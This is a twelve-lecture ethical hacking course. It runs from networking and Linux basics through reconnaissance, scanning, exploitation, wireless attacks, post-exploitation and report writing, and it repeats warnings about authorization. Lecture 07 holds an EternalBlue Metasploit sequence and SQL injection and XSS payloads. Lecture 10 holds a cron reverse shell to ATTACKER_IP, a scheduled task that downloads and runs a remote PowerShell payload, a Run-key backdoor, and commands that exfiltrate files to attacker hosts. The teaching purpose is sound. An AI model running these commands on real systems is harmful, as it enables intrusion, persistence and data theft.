Lecture 01 · Fundamentals

Introduction to Ethical Hacking

Beginner ~50 min

What is Ethical Hacking?

Ethical Hacking (also known as White Hat Hacking) is the authorized practice of bypassing system security to identify potential vulnerabilities. Ethical hackers help organizations strengthen their defenses by simulating real cyberattacks.

Key Principles

Permission First — Always obtain written authorization
Legal & Ethical — Follow laws and codes of conduct
Responsible Disclosure — Report findings professionally

Tools & Environment Setup

Recommended: Kali Linux (virtual machine) + tools like Nmap, Metasploit, Burp Suite, Wireshark.

terminal (Kali)

sudo apt update && sudo apt install nmap metasploit-framework

🎯 Exercise 1.1

Install Kali Linux in a virtual machine (VirtualBox/VMware). Run whoami and ifconfig to explore your environment. Read the EC-Council Code of Ethics.

Lecture 02 · Fundamentals

Network Basics for Ethical Hackers

Beginner ~60 min Requires: Lecture 01

Why Network Knowledge is Critical for Hacking

Almost every attack starts with understanding how networks communicate. As an ethical hacker, you must master networking concepts to identify vulnerabilities, map targets, and execute attacks safely.

1. OSI Model vs TCP/IP Model

OSI Layer	TCP/IP Layer	Key Protocols / Tools
7. Application	Application	HTTP, HTTPS, FTP, DNS, SMTP
6. Presentation		SSL/TLS, JPEG, ASCII
5. Session		NetBIOS, RPC
4. Transport	Transport	TCP, UDP, SCTP
3. Network	Internet	IP, ICMP, IGMP, Routing
2. Data Link	Network Access	Ethernet, MAC Address, ARP, PPP
1. Physical	Network Access	Cables, Switches, Wi-Fi signals

2. IP Addressing

terminal

ip addr show          # Linux
ipconfig              # Windows

# Example IPv4: 192.168.1.105/24
# Example IPv6: 2001:db8::1/64

Public vs Private IPs

Private: 10.0.0.0/8, 172.16.0.0/12, 192.168.0.0/16
Public: Routable on the internet

3. TCP vs UDP

Feature	TCP	UDP
Connection	Connection-oriented (3-way handshake)	Connectionless
Reliability	Reliable (ACK, retransmission)	Unreliable
Speed	Slower	Faster
Use Cases	HTTP, SSH, FTP	DNS, VoIP, Gaming, Streaming

4. Common Ports You Must Know

Port	Protocol	Service
20/21	TCP	FTP
22	TCP	SSH
23	TCP	Telnet
25	TCP	SMTP
53	TCP/UDP	DNS
80	TCP	HTTP
443	TCP	HTTPS
445	TCP	SMB
3306	TCP	MySQL
3389	TCP	RDP

5. Essential Tools

ifconfig / ip addr — View network interfaces
ping — Test reachability
traceroute / tracert — Path to destination
nslookup / dig — DNS queries
netstat / ss — Active connections
wireshark — Packet capture & analysis

✅ Pro Tip

Always start reconnaissance with passive techniques before active scanning to avoid detection.

🎯 Exercise 2.1 — Network Exploration

1. Find your IP address and default gateway.
2. Ping google.com and note the TTL.
3. Use nslookup to find the IP of a website.
4. Run traceroute google.com (or tracert on Windows).

🎯 Exercise 2.2

Write a short report (in a text file) explaining the difference between TCP and UDP with real-world examples relevant to hacking.

Lecture 03 · Fundamentals

Linux & Command Line Mastery for Hackers

Beginner ~65 min Requires: Lecture 02

Why Linux is Essential for Ethical Hacking

Most servers, networking devices, and penetration testing tools run on Linux. Kali Linux is the de-facto standard distribution for ethical hackers.

1. Linux File System Hierarchy

/ — Root directory
/home — User files
/etc — Configuration files
/var — Logs and variable data
/tmp — Temporary files
/bin & /usr/bin — Executable commands

2. Essential Commands Every Hacker Must Know

Navigation & File Management

pwd                    # Print Working Directory
ls -la                 # List files (detailed)
cd /etc                # Change directory
mkdir tools            # Create directory
touch test.txt         # Create empty file
cp file1 file2         # Copy
mv old new             # Move / Rename
rm -rf folder          # Remove (careful!)

System Information & Processes

uname -a               # System info
whoami                 # Current user
ps aux                 # Running processes
top                    # Live process monitor
kill PID               # Kill process
df -h                  # Disk usage

Networking Commands

ifconfig / ip addr     # Network interfaces
ping 8.8.8.8           # Test connectivity
netstat -tuln          # Listening ports
ss -tuln               # Modern alternative
traceroute google.com

3. Text Processing Tools (Hacker’s Best Friends)

cat — View file content
grep — Search text
sed — Stream editor
awk — Pattern scanning
cut / sort / uniq — Data manipulation

cat /etc/passwd | grep bash
ps aux | grep apache
netstat -tuln | grep 80

4. Kali Linux Specific Tools

nmap — Network scanner
metasploit — Exploitation framework
burpsuite — Web proxy
wireshark — Packet analyzer
john / hashcat — Password crackers

✅ Pro Tip

Learn to chain commands with pipes (|) and redirects (>, >>). This is where real power lies.

🎯 Exercise 3.1 — Linux Exploration

1. Find all files containing "password" in /etc
2. List all listening ports
3. Create a directory recon and a file targets.txt
4. Use history to see your previous commands

🎯 Exercise 3.2

Write a small bash script (system_info.sh) that displays: current user, IP address, OS version, and running services.

Lecture 04 · Fundamentals

Reconnaissance & Footprinting

Intermediate ~70 min Requires: Lecture 03

What is Reconnaissance?

Reconnaissance (Recon) is the first and most important phase of ethical hacking. It involves gathering as much information as possible about the target without being detected. Good recon can make or break an entire penetration test.

Types of Reconnaissance

Type	Description	Examples
Passive Recon	No direct interaction with target	Google, WHOIS, Shodan, Social Media
Active Recon	Direct interaction with target	Port scanning, Ping sweeps

1. Passive Reconnaissance Techniques

WHOIS Lookup

whois example.com
whois -h whois.iana.org example.com

Google Dorks (Advanced Search)

site:example.com filetype:pdf
inurl:admin site:example.com
intitle:"index of" "parent directory"

Shodan & Censys

Search engines for internet-connected devices.

2. Active Reconnaissance

Host Discovery

ping -c 4 target.com
nmap -sn 192.168.1.0/24          # Ping sweep

Port Scanning with Nmap

nmap -sV -O target.com                    # Service version + OS detection
nmap -sS -p- target.com                 # SYN scan all ports
nmap -sC -sV -A target.com              # Aggressive scan

3. DNS Reconnaissance

dig example.com ANY
dnsenum example.com
dnsrecon -d example.com -t std

4. OSINT Framework

People search: Pipl, Spokeo, LinkedIn
Company info: Hunter.io, theHarvester
Email harvesting: theHarvester

⚠️ Important Note

Always get explicit written permission before performing active reconnaissance on any target.

🎯 Exercise 4.1 — Passive Recon

Choose a public organization (e.g., a university or company) and gather:
• Domain registration info (WHOIS)
• Subdomains
• Public IP ranges
• Employee names and emails

🎯 Exercise 4.2 — Active Recon

Using your local lab environment or authorized test target:
1. Perform host discovery
2. Run a full port scan with service version detection
3. Save the output in XML format for later analysis

Lecture 05 · Fundamentals

Scanning & Enumeration

Intermediate ~75 min Requires: Lecture 04

Introduction to Scanning

Scanning is the process of actively probing a target to discover live hosts, open ports, running services, and operating systems. It bridges reconnaissance and exploitation.

1. Host Discovery (Finding Live Targets)

terminal

nmap -sn 192.168.1.0/24              # Ping sweep
nmap -PE -PP -PM target.com         # ICMP echo/timestamp/mask
masscan -p80,443 192.168.1.0/24 --rate=1000

2. Port Scanning Techniques

Scan Type	Command	Stealth Level	Use Case
TCP SYN Scan	`nmap -sS`	High	Default & fastest
TCP Connect Scan	`nmap -sT`	Low	When no raw socket privileges
UDP Scan	`nmap -sU`	Medium	DNS, SNMP, DHCP
Version Detection	`nmap -sV`	Medium	Service & version info

3. Advanced Nmap Usage

nmap -sS -sV -O -T4 target.com          # Aggressive scan
nmap -A target.com                     # Full aggressive scan
nmap -sC --script vuln target.com      # Vulnerability scripts
nmap -iL targets.txt -oX output.xml    # Input list, XML output

4. Enumeration (Service & User Enumeration)

Common Enumeration Techniques

SMB Enumeration: enum4linux, smbclient
SNMP Enumeration: snmpwalk
HTTP Enumeration: nikto, dirb, gobuster
LDAP Enumeration: ldapsearch

gobuster dir -u http://target.com -w /usr/share/wordlists/dirb/common.txt
enum4linux -a target.com
nikto -h http://target.com

5. Best Practices & OPSEC

Use slow timing (-T2 or -T3) on production systems
Always stay within scope
Document everything for the final report

⚠️ Legal Reminder

Never perform scanning on systems you do not have explicit written permission to test.

🎯 Exercise 5.1 — Practical Scanning

On your authorized lab environment or TryHackMe/HackTheBox machine:
1. Perform host discovery
2. Run a full port scan with service detection
3. Enumerate web directories using Gobuster
4. Save all results in organized folders

🎯 Exercise 5.2

Write a short methodology document explaining the difference between passive recon, active scanning, and enumeration.

Lecture 06 · Core Concepts

Vulnerability Analysis

Intermediate ~70 min Requires: Lecture 05

What is Vulnerability Analysis?

Vulnerability Analysis is the process of identifying, classifying, and prioritizing security weaknesses in systems, applications, and networks. It bridges scanning and exploitation phases.

Types of Vulnerabilities

Category	Examples	Common Impact
Network	Open ports, weak firewalls	Unauthorized access
Web Application	SQL Injection, XSS, CSRF	Data theft, session hijacking
Configuration	Default credentials, outdated software	Easy compromise
Zero-Day	Unknown vulnerabilities	High risk

1. Automated Vulnerability Scanners

Nessus / OpenVAS — Full vulnerability assessment
Nikto — Web server scanner
SQLMap — Automated SQL Injection
Metasploit — Exploitation framework with vulnerability checks

terminal

openvas-start
nikto -h http://target.com
sqlmap -u "http://target.com/login.php?id=1" --dbs
nmap --script vuln target.com

2. Manual Vulnerability Analysis

Review scan results for false positives
Check CVE databases (cve.mitre.org, nvd.nist.gov)
Analyze service banners and version numbers
Test for common misconfigurations

3. Vulnerability Scoring — CVSS

Common Vulnerability Scoring System rates severity from 0.0 to 10.0:

Critical: 9.0–10.0
High: 7.0–8.9
Medium: 4.0–6.9
Low: 0.1–3.9

4. Exploitation Preparation

After identifying vulnerabilities:

Search for public exploits (Exploit-DB, GitHub)
Use Metasploit modules
Develop custom exploits when needed

✅ Best Practice

Always verify vulnerabilities manually. Automated tools often produce false positives.

🎯 Exercise 6.1 — Vulnerability Scanning

On your authorized lab target:
1. Run OpenVAS / Nessus full scan
2. Run Nikto on any web services
3. Use Nmap vulnerability scripts
4. Document the top 5 findings with severity and recommended fixes

🎯 Exercise 6.2

Research one recent high-profile vulnerability (e.g., Log4Shell, EternalBlue) and write a short summary including CVE ID, affected systems, and mitigation steps.

Lecture 07 · Core Concepts

Exploitation Techniques

Advanced ~80 min Requires: Lecture 06

What is Exploitation?

Exploitation is the phase where you take advantage of identified vulnerabilities to gain unauthorized access or execute malicious code on the target system. This is the most sensitive and legally restricted phase of ethical hacking.

Types of Exploits

Type	Description	Examples
Remote Code Execution (RCE)	Execute code from a remote machine	EternalBlue, Log4Shell
Local Privilege Escalation	Gain higher privileges on compromised system	Sudo, Dirty COW
Client-Side Exploits	Target user applications (browsers, PDF readers)	Browser exploits, Malicious PDFs
Web Application Exploits	SQLi, XSS, File Inclusion	SQLMap, XSS payloads

1. Using Metasploit Framework

msfconsole

msfconsole
search eternalblue
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 192.168.1.100
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST your_ip
exploit

2. Common Exploitation Techniques

Buffer Overflow Exploitation

Overwriting memory to control program execution flow.

SQL Injection

' OR 1=1 --
1' UNION SELECT database(), user() --

Cross-Site Scripting (XSS)

<script>alert('XSS')</script>
<img src=x onerror=alert(1)>

3. Payload Types

Reverse Shell — Target connects back to attacker
Bind Shell — Listener on target
Meterpreter — Advanced Metasploit payload
stageless vs staged

4. Post-Exploitation

Gather credentials (hashdump)
Pivot to other systems
Install persistence (backdoors)
Clean logs

⚠️ Critical Rule

Exploitation must **only** be performed with explicit written authorization. Unauthorized exploitation is illegal.

🎯 Exercise 7.1 — Safe Exploitation Lab

Using Metasploitable 2 or a TryHackMe room:
1. Scan the target
2. Find and exploit at least 2 vulnerabilities using Metasploit
3. Get a Meterpreter session
4. Dump password hashes

🎯 Exercise 7.2

Write a short report on one real-world exploit (e.g., EternalBlue or Log4Shell) covering discovery, impact, and mitigation.

Lecture 08 · Core Concepts

Web Application Security

Advanced ~75 min Requires: Lecture 07

Why Web Apps Are Prime Targets

Web applications are often the weakest link in an organization’s security. They are publicly accessible, handle sensitive data, and frequently contain logic flaws that automated scanners miss.

1. OWASP Top 10 (2021)

Rank	Vulnerability	Impact
A01	Broken Access Control	Unauthorized data access
A02	Cryptographic Failures	Data theft
A03	Injection (SQLi, Command)	Full compromise
A04	Insecure Design	Systemic flaws
A05	Security Misconfiguration	Easy entry point
A06	Vulnerable Components	Supply chain attacks
A07	Identification Failures	Account takeover
A08	Software/Data Integrity Failures	Supply chain attacks
A09	Security Logging Failures	Hard to detect
A10	Server-Side Request Forgery (SSRF)	Internal network access

2. Common Web Vulnerabilities & Exploitation

SQL Injection

' OR '1'='1' --
1 UNION SELECT username,password FROM users --

Cross-Site Scripting (XSS)

<script>alert(document.cookie)</script>
<img src=x onerror=alert(1)>

Command Injection

; ls -la
| whoami

3. Web Application Testing Tools

Burp Suite — Proxy & scanning (gold standard)
OWASP ZAP — Free automated scanner
SQLMap — Automated SQL Injection
Gobuster / FFUF — Directory brute-forcing
Postman / Insomnia — API testing

4. Secure Development Practices

Input validation & sanitization
Prepared statements for SQL
CSRF tokens
Content Security Policy (CSP)
Regular dependency updates

✅ Pro Tip

Always test web applications with both automated tools and manual techniques. Many critical flaws (logic bugs, business logic flaws) are only found manually.

🎯 Exercise 8.1 — Web App Testing

Using a legal lab target (DVWA, Juice Shop, or TryHackMe Web Fundamentals room):
1. Perform directory brute-forcing
2. Test for SQL Injection
3. Find and exploit at least one XSS vulnerability
4. Document your findings

🎯 Exercise 8.2

Choose one OWASP Top 10 vulnerability and write a short report explaining how it works, real-world impact, and how to prevent it.

Lecture 09 · Advanced

Wireless & Mobile Hacking

Advanced ~75 min Requires: Lecture 08

Wireless Networks: The Hidden Attack Surface

Wireless networks (Wi-Fi, Bluetooth, NFC) are often less secured than wired ones, making them prime targets for attackers. Ethical hackers must understand how to assess and secure them.

1. Wi-Fi Hacking Fundamentals

Wi-Fi Security Standards

Protocol	Security	Status
WEP	Very Weak	Broken
WPA	Weak	Crackable
WPA2	Strong (PSK)	Still widely used
WPA3	Strongest	Recommended

Common Attacks

WPS PIN Attack — Brute force WPS
KRACK Attack — WPA2 handshake attack
Evil Twin / Rogue AP — Fake access points
Deauthentication Attack — Force reconnection

2. Tools for Wireless Attacks

Kali Linux

airmon-ng start wlan0
airodump-ng wlan0mon
aireplay-ng --deauth 10 -a AP_MAC wlan0mon
reaver -i wlan0mon -b BSSID -vv
wifiphisher

3. Mobile Device Hacking

Android Attacks

APK reverse engineering
Malicious apps & sideloading
ADB exploitation
Frida & Objection for runtime manipulation

iOS Attacks

Jailbreaking
IPA analysis
Checkra1n / unc0ver exploits

4. Bluetooth & NFC Attacks

BlueBorne vulnerability
Bluetooth pairing attacks
NFC relay & cloning attacks

⚠️ Legal & Ethical Note

Wireless attacks must only be performed on networks you own or have explicit written permission to test. Unauthorized Wi-Fi hacking is illegal in most jurisdictions.

🎯 Exercise 9.1 — Wireless Assessment

In a controlled environment (your own router):
1. Put your wireless card in monitor mode
2. Capture handshakes using Aircrack-ng suite
3. Attempt to crack a WPA2 password using a wordlist
4. Document the entire process

🎯 Exercise 9.2

Research one major wireless vulnerability (e.g., KRACK or BlueBorne) and write a one-page summary including discovery year, impact, and current mitigation.

Lecture 10 · Advanced

Post-Exploitation & Persistence

Advanced ~70 min Requires: Lecture 09

What is Post-Exploitation?

Post-Exploitation is the phase after gaining initial access. The goal is to maintain access, gather valuable information, move laterally, and achieve the objectives of the penetration test while remaining undetected.

1. Situational Awareness (What You Do First)

Meterpreter / Shell

sysinfo
getuid
ifconfig / ip addr
whoami
ps
netstat -tuln

2. Privilege Escalation

Kernel exploits (Dirty COW, CVE-2021-4034)
Service misconfigurations
Weak file permissions
Password reuse / credential dumping

3. Persistence Techniques

Common Methods

# Linux
crontab -e
echo "*/5 * * * * bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1" >> /etc/crontab

# Windows
schtasks /create /tn "Update" /tr "powershell.exe -c 'IEX (New-Object Net.WebClient).DownloadString(''http://attacker/payload.ps1'')'" /sc minute /mo 5
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Backdoor /t REG_SZ /d "C:\evil.exe"

Advanced Persistence

SSH keys (authorized_keys)
Web shells
Registry Run keys (Windows)
Kernel modules / rootkits

4. Lateral Movement

Pass-the-Hash / Pass-the-Ticket
Pivoting through compromised hosts
RDP, WinRM, PsExec
SSH tunneling

5. Data Exfiltration

scp sensitive.txt user@attacker_ip:/tmp/
curl -F "[email protected]" http://attacker/upload
powershell -c "Invoke-WebRequest -Uri http://attacker/exfil -Method POST -Body (Get-Content secret.txt)"

⚠️ Important

In a real engagement, you must strictly follow the Rules of Engagement (RoE). Never exfiltrate real sensitive data without explicit permission.

🎯 Exercise 10.1 — Post-Exploitation Practice

On a vulnerable lab machine (Metasploitable / TryHackMe):
1. Gain initial access
2. Perform privilege escalation
3. Establish persistence (cron / scheduled task)
4. Demonstrate lateral movement or data collection

🎯 Exercise 10.2

Document 3 different persistence techniques (one Linux, one Windows, one cross-platform) with commands and detection methods.

Lecture 11 · Advanced

Reporting & Legal Aspects

Advanced ~65 min Requires: Lecture 10

Why Reporting is the Most Important Phase

The final deliverable of any ethical hacking engagement is a **professional report**. Even the best technical work is useless if it cannot be clearly communicated to stakeholders.

1. Types of Reports

Executive Summary — For management (non-technical)
Technical Report — Detailed findings for IT/security team
Remediation Roadmap — Prioritized action plan

2. Structure of a Professional Pentest Report

Section	Content
1. Cover Page & NDA	Confidentiality notice
2. Executive Summary	High-level findings & risk rating
3. Methodology	Scope, tools, timeline
4. Findings	Each vulnerability with: • Risk rating (Critical/High/Medium/Low) • Description • Proof of Concept (PoC) • Impact • Recommendation
5. Conclusion & Next Steps	Overall risk posture

3. Legal & Ethical Considerations

Rules of Engagement (RoE) — Must be signed before testing
Get Out of Jail Free (GOJFF) Letter — Written authorization
Non-Disclosure Agreement (NDA)
Scope Creep — Never test beyond agreed scope
Data Handling — Proper destruction of sensitive data after engagement

4. Risk Rating Methodology

Use CVSS v3.1 scoring + business impact to assign severity.

✅ Professional Tip

Always include screenshots, command logs, and clear step-by-step reproduction instructions in findings. Make remediation easy for the client.

🎯 Exercise 11.1 — Report Writing

Using findings from previous lab exercises, write a professional vulnerability report for one critical finding. Include:
• Executive summary
• Detailed technical description
• Risk rating
• Proof of Concept
• Remediation steps

🎯 Exercise 11.2

Research and summarize the legal implications of unauthorized penetration testing in your country (or India, since you are in Ludhiana).

Lecture 12 · Capstone

Capstone Project: Full Penetration Test

Advanced ~120 min + ongoing Requires: All Previous Lectures

Project Overview

Congratulations! You have reached the final lecture. Now you will perform a **complete, realistic penetration test** on a vulnerable target, following professional methodology.

Target Environment

Use one of these legal lab environments:

Metasploitable 2 / 3
TryHackMe / HackTheBox machines (recommended)
DVWA + VulnHub VMs
Your own isolated virtual lab

Capstone Requirements

Phase 1: Reconnaissance & Footprinting

Passive information gathering (WHOIS, Google Dorks, Shodan)
Active host & service discovery

Phase 2: Scanning & Enumeration

Full port scanning with Nmap
Service version detection
Web directory brute-forcing
SMB / SNMP enumeration (if applicable)

Phase 3: Vulnerability Analysis & Exploitation

Identify at least 3 exploitable vulnerabilities
Gain initial shell access (Meterpreter or reverse shell)
Perform privilege escalation

Phase 4: Post-Exploitation & Persistence

Establish persistence
Extract sensitive data / credentials
Demonstrate lateral movement (if multiple machines)

Phase 5: Reporting

Write a full professional penetration testing report
Include Executive Summary, Methodology, Findings with PoC, Risk Ratings, and Remediation Recommendations

🚀 Success Criteria

You should be able to:

Compromise at least one machine with root/admin access
Document everything clearly
Provide actionable remediation steps

Bonus Challenges (Optional)

Crack captured password hashes
Perform a client-side attack (phishing simulation)
Exploit a web application vulnerability manually
Create a custom payload / bypass antivirus

🎯 Final Capstone Deliverable

Submit a complete penetration testing report (PDF) including all phases above. This report should be written as if you are presenting it to a real client.

🎉 Congratulations!

You have completed the full Ethical Hacking Mastery course. You now possess the foundational and practical skills required to begin your journey as an ethical hacker / penetration tester.

Next Steps: Practice on HackTheBox, TryHackMe, or CTF platforms. Consider certifications like CEH, eJPT, or OSCP.